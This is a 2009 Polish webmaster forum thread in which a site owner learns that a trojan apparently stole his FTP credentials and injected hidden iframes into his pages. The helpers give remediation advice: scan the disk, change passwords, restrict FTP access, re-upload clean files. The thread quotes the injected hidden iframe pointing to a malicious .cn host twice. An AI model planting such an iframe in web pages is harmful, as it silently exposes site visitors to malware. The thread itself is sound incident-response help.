Ta strona używa ciasteczek (cookies), dzięki którym nasz serwis może działać lepiej. Dowiedz się więcej OK, rozumiem

Problem ze stroną index, strona opada w dół (przesuwa się)

Zaczynasz dopiero swoją przygodę z HTML'em? A może mimo swojego doświadczenia natknąłeś się na jakiś problem? Tutaj na pewno znajdziesz pomoc.

Problem ze stroną index, strona opada w dół (przesuwa się)

Post 05.06.2009, 09:03:29

Witam, stowrzyłem stronę www.centrumokna.pl

Jest na serwerze proste.pl tam też kupiłem domene. Problem jest następujący po kilku dniach wchodzę na stronę a cała strona index, wraz z banerem jest przesunięta w dół, natomiast inne strony są dobre czyli baner na samej górze okna przegladarki.

Wrzucam więc ponownie plik index na serwer (wczoraj) i strona działa normalnie, dziś rano wchodzę, znów jest przesunięta w dół:/

Prosiłbym o wskazówkę, bo na prawdę nie wiem czemu tak się dzieje.

Pozdrawiam Krzysztof
krzys0312
Posty: 13
Dołączył(a): 26.02.2009

Post 05.06.2009, 09:14:33

Kod: Zaznacz cały
<iframe src="http://mixlotsite.cn:8080/ts/in.cgi?pepsi45" width=125 height=125 style="visibility: hidden"></iframe>

to Twoje? wygląda na to, że serwer prowadzi taką politykę, iż doczepia jakieś reklamy do stronek na serwerze, albo co gorsza piszesz, że dotyczy to tylko pliku index.php
i założę się, że korzystasz z Total Commandera. ostatnio był taki trojan który logował się po hasłach w Total Commandarze i wstawiał złośliwe ramki. Przeskanuj dysk jak będziesz miał pewność, że jest czysty pozmieniaj hasła do ftp. Jeżeli Twój dostawca usług umożliwia taką ewentualność zablokuj możliwość łączenia się przez ftpa z innego IP niż Twoje.
nawet teraz łącząc się z Twoja stronką mój antywirus wykrzyczał konia trojańskiego.
Avatar użytkownikaJaason
Tomasz Waszkiewicz

capoeirista
capoeirista

Posty: 3511
Dołączył(a): 14.04.2002
Lokalizacja: Warszawa

Post 05.06.2009, 09:20:11

korzystam z Total Commandera, serwer jest płatny i nie doczepia żadnego syfu, i wczoraj właśnie jakieś wirusy mi podczas przeglądania internetu zaczeły wyskakiwać ehh:/ Jaason jak myślisz aktualizowany Avast cokolwiek może zaradzić?

PS: ten kod nie mój:(
krzys0312
Posty: 13
Dołączył(a): 26.02.2009

Post 05.06.2009, 11:10:06

Avast nie wiem, bo nie używam ale spróbować nie zawadzi. Ja używam Nod32 i mam spokój;]
Avatar użytkownikaJaason
Tomasz Waszkiewicz

capoeirista
capoeirista

Posty: 3511
Dołączył(a): 14.04.2002
Lokalizacja: Warszawa

Post 05.06.2009, 14:50:22

Sprawdziłem, mam to na 3 stronach, kod jest taki

<iframe src="http://mixlotsite.cn:8080/ts/in.cgi?pepsi45" width=125 height=125 style="visibility: hidden"></iframe>

Wiecie jak mogę z tym walczyć?
krzys0312
Posty: 13
Dołączył(a): 26.02.2009

Post 05.06.2009, 15:13:16

już Ci napisałem.
zeskanuj dysk twardy, upewnij się, że jest czysty wtedy zmień hasła do ftpa na hostingu, potem wpisz nowe w totalcommanderze...
jak jest opcja ustawienia IP z ktorego możesz się łączyć przez FTP - ustaw je.
Avatar użytkownikaJaason
Tomasz Waszkiewicz

capoeirista
capoeirista

Posty: 3511
Dołączył(a): 14.04.2002
Lokalizacja: Warszawa

Post 05.06.2009, 15:22:34

A z tymi plikami na hostingu, to tylko wykasować pliki index i wysłać od nowa?

PS: bardzo dziękuję za pomoc
krzys0312
Posty: 13
Dołączył(a): 26.02.2009

Post 05.06.2009, 15:50:13

jak najbardziej. nie ma za co;]
Avatar użytkownikaJaason
Tomasz Waszkiewicz

capoeirista
capoeirista

Posty: 3511
Dołączył(a): 14.04.2002
Lokalizacja: Warszawa


Powrót do Początkujący webmaster


 


  • Podobne wątki
    Odpowiedzi
    Wyświetlone
    Ostatni post

Kto przegląda forum

Użytkownicy przeglądający ten dział: Brak zidentyfikowanych użytkowników i 15 gości

Hosting, Domeny, SSL

Subskrypcja

Mamy 51198 zarejestrowanych użytkowników.
Najnowszy użytkownik: matser87


Nasi użytkownicy napisali:

  • 936902 wiadomości
  • w 247063 tematach

Najnowsze wpisy na blogu

Najnowsze artykuły

Najaktywniejsi (ostatnie 30 dni)